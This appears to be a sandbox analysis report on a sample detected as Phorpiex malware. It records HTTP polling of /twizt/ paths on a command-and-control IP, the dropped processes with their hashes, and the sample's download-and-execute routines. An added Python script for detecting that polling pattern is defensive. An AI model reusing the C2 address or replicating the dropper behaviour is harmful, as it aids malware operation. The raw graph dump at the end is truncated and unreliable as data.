                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:32.406368971 CEST7046OUTGET /twizt/5 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:32.463176012 CEST7046INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:32 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:33.479639053 CEST7047OUTGET /twizt/6 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:33.536449909 CEST7047INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:33 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
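The three exchanges above show a client that identifies itself as Chrome, fetches /twizt/4, /twizt/5 and /twizt/6 from a bare IP address about one second apart, and gets an nginx 404 every time. That combination (sequential numeric paths, IP-literal Host header, browser User-Agent, all-error responses) is what a network detection can key on, independent of the specific IP. The Python below is an added example written for this page; it is not part of the Joe Sandbox report or of the sample. It parses traffic lines in the report's own layout (timestamp, stream id, OUT/IN, first line, then "Key: value" header lines) and flags runs of requests to one host whose paths differ only by a trailing integer that steps by one. It generalises beyond /twizt/: any path prefix and any host are handled. The event-line regex, the thresholds (5-second gap, 3-request minimum), the scoring and the constructed SAMPLE (copied from the three requests above with the bodies and most response headers dropped) are assumptions.

```python
import ipaddress
import re
from datetime import datetime, timedelta

# Constructed sample in the report's own traffic layout: the three exchanges captured
# above, with the Server/Date/Content-* headers and the hex/ascii bodies omitted.
SAMPLE = """\
Aug 15, 2022 18:32:31.339890957 CEST7045OUTGET /twizt/4 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Host: 185.215.113.66
Aug 15, 2022 18:32:31.397250891 CEST7045INHTTP/1.1 404 Not Found
Aug 15, 2022 18:32:32.406368971 CEST7046OUTGET /twizt/5 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Host: 185.215.113.66
Aug 15, 2022 18:32:32.463176012 CEST7046INHTTP/1.1 404 Not Found
Aug 15, 2022 18:32:33.479639053 CEST7047OUTGET /twizt/6 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Host: 185.215.113.66
Aug 15, 2022 18:32:33.536449909 CEST7047INHTTP/1.1 404 Not Found
"""

# Assumed event-line layout: "<Mon D, YYYY HH:MM:SS.frac> <TZ><stream id><OUT|IN><first line>".
EVENT_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(?P<frac>\d+) "
    r"[A-Z]{3,4}(?P<stream>\d+)(?P<dir>OUT|IN)(?P<first>.*)$")
TRAILING_INT_RE = re.compile(r"^(?P<prefix>.*/)(?P<n>\d+)$")


def parse_events(text):
    """One event per OUT/IN line; the "Key: value" lines that follow become its headers."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%b %d, %Y %H:%M:%S")
            ts += timedelta(microseconds=int(m["frac"][:6].ljust(6, "0")))
            events.append({"ts": ts, "stream": m["stream"], "dir": m["dir"],
                           "first": m["first"], "headers": {}})
        elif events and ":" in line:
            key, _, value = line.partition(":")
            events[-1]["headers"][key.strip().lower()] = value.strip()
    return events


def pair_requests(events):
    """Join each OUT request with the IN response carried on the same stream id."""
    responses = {e["stream"]: e for e in events if e["dir"] == "IN"}
    pairs = []
    for e in (e for e in events if e["dir"] == "OUT"):
        path = (e["first"].split(" ") + [""])[1]
        resp = responses.get(e["stream"])
        parts = resp["first"].split(" ") if resp else []
        status = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else None
        pairs.append({"ts": e["ts"], "host": e["headers"].get("host", ""), "path": path,
                      "ua": e["headers"].get("user-agent", ""), "status": status})
    return pairs


def is_ip_literal(host):
    """True when the Host header is a bare IPv4/IPv6 address (optionally :port) rather than a name."""
    try:
        ipaddress.ip_address(host.rsplit(":", 1)[0] if host.count(":") == 1 else host)
        return True
    except ValueError:
        return False


def find_sequential_polling(pairs, max_gap=timedelta(seconds=5), min_run=3):
    """Runs of >= min_run requests to one host whose paths share a prefix and end in an
    integer stepping by exactly 1, each sent within max_gap of the previous request."""
    by_host = {}
    for p in sorted(pairs, key=lambda p: p["ts"]):
        by_host.setdefault(p["host"], []).append(p)
    findings = []
    for host, reqs in by_host.items():
        run = []  # (prefix, n, request) tuples of the current candidate run
        for p in reqs:
            m = TRAILING_INT_RE.match(p["path"])
            broken = m is None or (run and (m["prefix"] != run[-1][0]
                                            or int(m["n"]) != run[-1][1] + 1
                                            or p["ts"] - run[-1][2]["ts"] > max_gap))
            if broken:
                if len(run) >= min_run:
                    findings.append(_describe(host, run))
                run = []
            if m:
                run.append((m["prefix"], int(m["n"]), p))
        if len(run) >= min_run:
            findings.append(_describe(host, run))
    return findings


def _describe(host, run):
    reqs = [r[2] for r in run]
    ip_host = is_ip_literal(host)
    all_404 = all(r["status"] == 404 for r in reqs)
    browser_ua = any("Mozilla/" in r["ua"] for r in reqs)
    return {"host": host, "prefix": run[0][0], "first": run[0][1], "last": run[-1][1],
            "count": len(reqs), "ip_literal_host": ip_host, "all_404": all_404,
            "browser_ua_to_ip": browser_ua and ip_host,
            # each independent oddity adds one point; the sequential run itself is worth one
            "score": 1 + int(ip_host) + int(all_404) + int(browser_ua and ip_host)}
```

Running find_sequential_polling(pair_requests(parse_events(SAMPLE))) yields one finding for 185.215.113.66 covering /twizt/4 to /twizt/6 with a score of 4. The run detector deliberately breaks on any skipped number, so a browser prefetching unrelated numbered resources out of order does not trigger it; if you feed it a proxy log instead of a sandbox capture, only the parser needs replacing, the pair dicts it produces are the contract.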


                                                                                Target ID:0
                                                                                Start time:18:31:06
                                                                                Start date:15/08/2022
                                                                                Path:C:\Users\user\Desktop\Id4zlrsrZ4.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\Id4zlrsrZ4.exe"
                                                                                Imagebase:0x400000
                                                                                File size:77312 bytes
                                                                                MD5 hash:ED2D7B25BB360CCCB4F0F6A4F8732D7A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000000.00000000.339631076.0000000000410000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000000.00000003.345540148.0000000000733000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                Reputation:low

                                                                                Target ID:1
                                                                                Start time:18:31:08
                                                                                Start date:15/08/2022
                                                                                Path:C:\Windows\winrecsv.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\winrecsv.exe
                                                                                Imagebase:0x400000
                                                                                File size:77312 bytes
                                                                                MD5 hash:ED2D7B25BB360CCCB4F0F6A4F8732D7A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000001.00000000.345529527.0000000000410000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Windows\winrecsv.exe, Author: Joe Security
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Avira
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                • Detection: 74%, ReversingLabs
                                                                                Reputation:low

                                                                                Target ID:5
                                                                                Start time:18:31:21
                                                                                Start date:15/08/2022
                                                                                Path:C:\Windows\winrecsv.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\winrecsv.exe"
                                                                                Imagebase:0x400000
                                                                                File size:77312 bytes
                                                                                MD5 hash:ED2D7B25BB360CCCB4F0F6A4F8732D7A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000005.00000000.377037453.0000000000410000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                Reputation:low

                                                                                Target ID:7
                                                                                Start time:18:31:34
                                                                                Start date:15/08/2022
                                                                                Path:C:\Users\user\AppData\Local\Temp\509517324.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user~1\AppData\Local\Temp\509517324.exe
                                                                                Imagebase:0x10d0000
                                                                                File size:6656 bytes
                                                                                MD5 hash:A475E43527D7DC7D6F2D23BAD64FCC99
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Avira
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                • Detection: 52%, Metadefender, Browse
                                                                                • Detection: 88%, ReversingLabs
                                                                                Reputation:low


                                                                                  Execution Graph

                                                                                  Execution Coverage:1.1%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:16.4%
                                                                                  Total number of Nodes:1462
                                                                                  Total number of Limit Nodes:7
execution_graph: interactive node/edge listing (1462 nodes), not reproduced. Function entry points and the API calls the graph attributes to them, in the captured portion:

0x404000: memset, GetModuleHandleW, Sleep, GetTickCount, wsprintfW, RegisterClassExW, CreateWindowExW, GetMessageA, TranslateMessage, DispatchMessageA, ExitThread (window message loop)
0x4047e0: GetDriveTypeW, QueryDosDeviceW, StrCmpNW
0x404860: lstrcpyW; calls 0x4047e0
0x4048c0: GetLogicalDrives, RegOpenKeyExW, RegQueryValueExW, RegCloseKey
0x404980: CoInitialize, CoCreateInstance, wsprintfW
0x404a90: CreateDirectoryW, wsprintfW, FindFirstFileW, lstrcmpW, MoveFileExW, FindNextFileW, FindClose, RemoveDirectoryW
0x404bd0: _chkstk, PathFileExistsW, CreateDirectoryW, SetFileAttributesW, CopyFileW, DeleteFileW, FindFirstFileW, FindNextFileW, FindClose, lstrcmpW, lstrcmpiW, PathMatchSpecW, wsprintfW, MoveFileExW; calls 0x40d530, 0x404980, 0x404a90
0x4050e8 / 0x405106: GetVolumeInformationW, GetDiskFreeSpaceExW, _aulldiv, wsprintfW, Sleep, ExitThread; loops over 0x404860, 0x4048c0 and 0x404bd0
0x405800: StrChrA, Sleep; calls 0x40d890
0x405900: Sleep, wsprintfA; calls 0x40d7f0 and 0x40d890
0x40908e: memcpy; calls 0x408fb0 and 0x408e60
0x408fb0 (__aligned_recalloc_base): GetCurrentProcessId, HeapValidate, HeapFree
0x409940: shutdown, closesocket
0x409f60 / 0x409c30: EnterCriticalSection, LeaveCriticalSection
0x40a1a0: lstrlenA
0x40a890: memcpy
0x40a990: memmove
0x40bab0: InterlockedExchangeAdd, InterlockedIncrement, InterlockedDecrement, inet_ntoa (via 0x409820); calls 0x409940
0x40bc50: WaitForSingleObject; calls 0x409f60 and 0x40bab0
0x40bd00: InterlockedDecrement, InterlockedIncrement (via 0x40e440); calls 0x409c30, 0x40a890, 0x40a990, 0x40a4f0
0x40c040: GetCurrentThread, GetThreadPriority, SetThreadPriority, InterlockedExchangeAdd, EnterCriticalSection, LeaveCriticalSection, WaitForSingleObject, Sleep
0x40c180: EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, CloseHandle, WSACloseEvent; calls 0x409940
0x40c2c0: InterlockedExchangeAdd, WaitForSingleObject; calls 0x40e110, 0x40e0a0, 0x409f60, 0x40a390
0x40d530: CreateFileW, GetFileSize, CloseHandle
0x40d580: CreateFileW, CreateFileMappingW, MapViewOfFile, GetFileSize, UnmapViewOfFile, WriteFile, CloseHandle
0x40d7f0: InternetOpenA, InternetOpenUrlA, HttpQueryInfoA, InternetCloseHandle (URL reachability check)
0x40d890: GetTickCount, srand, ExpandEnvironmentStringsW, mbstowcs, rand, wsprintfW, InternetOpenW, InternetOpenUrlW, CreateFileW, InternetReadFile, WriteFile, CloseHandle, InternetCloseHandle, DeleteFileW, Sleep, ExitProcess; calls 0x40d580 and 0x40d740 (downloads a URL into a file built from rand()-derived names)
0x40df70: memcpy, htons, sendto, InterlockedExchangeAdd (datagram send)
0x40e0a0: SetEvent, WaitForSingleObject, CloseHandle; calls 0x409940
0x40e110: CreateEventA, socket, bind, CreateThread
0x40e480: EnterCriticalSection, LeaveCriticalSection, SetEvent, PostQueuedCompletionStatus, InterlockedDecrement, InterlockedExchangeAdd, InterlockedIncrement, DeleteCriticalSection; calls 0x40c040, 0x40ead0, 0x40c180
0x40ead0: WSARecv, WSAGetLastError, Sleep
0x40eea0: GetSystemInfo, InitializeCriticalSection, CreateEventA, CreateIoCompletionPort, WSASocketA, setsockopt, htons, bind, listen, WSACreateEvent, WSAEventSelect (completion-port TCP listener)
0x40f088: RtlUnwind, NtQueryVirtualMemory
calls 5163->5164 5164->5155 5164->5156 5164->5159 5164->5160 5164->5163 5166 408fb0 __aligned_recalloc_base 3 API calls 5164->5166 5175 40a4f0 5164->5175 5166->5164 5168 40b9cd socket 5167->5168 5169 40b9e2 htons connect 5168->5169 5170 40ba3f 5168->5170 5169->5170 5171 40ba2a 5169->5171 5170->5168 5172 40ba33 5170->5172 5190 409940 shutdown closesocket 5171->5190 5172->5154 5172->5162 5174->5158 5186 40a501 5175->5186 5177 40a51f 5179 408fb0 __aligned_recalloc_base 3 API calls 5177->5179 5180 40a884 5179->5180 5180->5164 5181 40a240 20 API calls 5181->5186 5184 40a390 13 API calls 5184->5186 5185 409f40 25 API calls 5185->5186 5186->5177 5186->5181 5186->5184 5186->5185 5191 40a410 5186->5191 5198 409fb0 EnterCriticalSection 5186->5198 5203 405430 5186->5203 5208 405470 5186->5208 5213 405340 5186->5213 5220 4053a0 5186->5220 5189->5162 5190->5172 5192 40a421 lstrlenA 5191->5192 5193 40ae60 7 API calls 5192->5193 5195 40a43f 5193->5195 5194 40a4cf 5194->5186 5195->5192 5197 40a44b 5195->5197 5196 408fb0 __aligned_recalloc_base 3 API calls 5196->5194 5197->5194 5197->5196 5199 409fc8 5198->5199 5200 40a004 LeaveCriticalSection 5199->5200 5223 40c210 NtQuerySystemTime RtlTimeToSecondsSince1980 5199->5223 5200->5186 5202 409ff3 5202->5200 5224 4053d0 5203->5224 5206 405469 5206->5186 5207 40bf50 17 API calls 5207->5206 5209 4053d0 65 API calls 5208->5209 5210 40548f 5209->5210 5211 4054bc 5210->5211 5234 4052f0 5210->5234 5211->5186 5237 4044c0 EnterCriticalSection 5213->5237 5215 40535a 5216 40538d 5215->5216 5242 405250 5215->5242 5216->5186 5219 408fb0 __aligned_recalloc_base 3 API calls 5219->5216 5249 404580 EnterCriticalSection 5220->5249 5222 4053c2 5222->5186 5223->5202 5227 4053e3 5224->5227 5225 405420 5225->5206 5225->5207 5227->5225 5228 4043d0 EnterCriticalSection 5227->5228 5229 40b4f0 63 API calls 5228->5229 5230 4043f0 5229->5230 5231 40449e LeaveCriticalSection 5230->5231 5232 408fb0 __aligned_recalloc_base 3 API calls 5230->5232 5231->5227 5233 
40449b 5232->5233 5233->5231 5235 40a1a0 13 API calls 5234->5235 5236 405335 5235->5236 5236->5211 5239 4044de 5237->5239 5238 40456a LeaveCriticalSection 5238->5215 5239->5238 5240 409020 8 API calls 5239->5240 5241 40453c 5240->5241 5241->5238 5243 408e60 __aligned_recalloc_base 7 API calls 5242->5243 5244 405262 memcpy 5243->5244 5245 40a1a0 13 API calls 5244->5245 5246 4052cc 5245->5246 5247 408fb0 __aligned_recalloc_base 3 API calls 5246->5247 5248 4052db 5247->5248 5248->5219 5273 40b550 5249->5273 5252 4047be LeaveCriticalSection 5252->5222 5253 40b4f0 63 API calls 5255 4045bb 5253->5255 5254 4046d3 5256 4046fc 5254->5256 5257 4040f0 15 API calls 5254->5257 5255->5252 5255->5254 5259 408fb0 __aligned_recalloc_base 3 API calls 5255->5259 5258 408fb0 __aligned_recalloc_base 3 API calls 5256->5258 5257->5256 5260 40471d 5258->5260 5261 404632 5259->5261 5260->5252 5262 40472c CreateFileW 5260->5262 5263 409020 8 API calls 5261->5263 5262->5252 5264 40474f 5262->5264 5265 404642 5263->5265 5268 4047aa FlushFileBuffers CloseHandle 5264->5268 5269 40476c WriteFile 5264->5269 5266 408fb0 __aligned_recalloc_base 3 API calls 5265->5266 5267 404669 5266->5267 5270 40ae60 7 API calls 5267->5270 5268->5252 5269->5264 5271 4046a0 5270->5271 5272 4058a0 10 API calls 5271->5272 5272->5254 5276 40aaa0 5273->5276 5281 40aab3 5276->5281 5277 409020 8 API calls 5277->5281 5278 40aacd 5280 408fb0 __aligned_recalloc_base 3 API calls 5278->5280 5279 40aa00 62 API calls 5279->5281 5282 4045a4 5280->5282 5281->5277 5281->5278 5281->5279 5283 406920 61 API calls 5281->5283 5282->5252 5282->5253 5283->5281 5361 40edd0 GetQueuedCompletionStatus 5362 40ee12 5361->5362 5367 40ee88 5361->5367 5363 40ee17 WSAGetOverlappedResult 5362->5363 5368 40ebe0 5362->5368 5363->5362 5365 40ee39 WSAGetLastError 5363->5365 5365->5362 5366 40ee53 GetQueuedCompletionStatus 5366->5362 5366->5367 5369 40ed72 InterlockedDecrement setsockopt closesocket 5368->5369 5370 40ebf4 5368->5370 5371 40ecb9 
5369->5371 5370->5369 5372 40ebfc 5370->5372 5371->5366 5388 40c210 NtQuerySystemTime RtlTimeToSecondsSince1980 5372->5388 5374 40ec01 InterlockedExchange 5375 40ec18 5374->5375 5376 40ecce 5374->5376 5375->5371 5379 40ec29 InterlockedDecrement 5375->5379 5380 40ec3c InterlockedDecrement InterlockedExchangeAdd 5375->5380 5377 40ece7 5376->5377 5378 40ecd7 InterlockedDecrement 5376->5378 5381 40ecf2 5377->5381 5382 40ed07 InterlockedDecrement 5377->5382 5378->5366 5379->5366 5383 40ecaf 5380->5383 5397 40e960 WSASend 5381->5397 5385 40ed69 5382->5385 5389 40eb70 5383->5389 5385->5366 5386 40ecfe 5386->5366 5388->5374 5390 40eb80 InterlockedExchangeAdd 5389->5390 5391 40eb7c 5389->5391 5392 40ebd3 5390->5392 5393 40eb97 InterlockedIncrement 5390->5393 5391->5371 5392->5371 5394 40ead0 4 API calls 5393->5394 5395 40ebc6 5394->5395 5395->5392 5396 40ebcc InterlockedDecrement 5395->5396 5396->5392 5398 40e9d0 5397->5398 5399 40e992 WSAGetLastError 5397->5399 5398->5386 5399->5398 5400 40e99f 5399->5400 5401 40e9d6 5400->5401 5402 40e9a6 Sleep WSASend 5400->5402 5401->5386 5402->5398 5402->5399 5731 40f090 5732 40f144 5731->5732 5733 40f0ae 5731->5733 5734 40f2cd NtQueryVirtualMemory 5733->5734 5736 40f0c9 5734->5736 5735 40f1b8 RtlUnwind 5735->5736 5736->5732 5736->5735 5737 40e290 5738 40e2a7 5737->5738 5744 40e320 5737->5744 5739 40e2b7 5738->5739 5740 40e2d5 EnterCriticalSection 5738->5740 5741 40e30c LeaveCriticalSection DeleteCriticalSection 5740->5741 5745 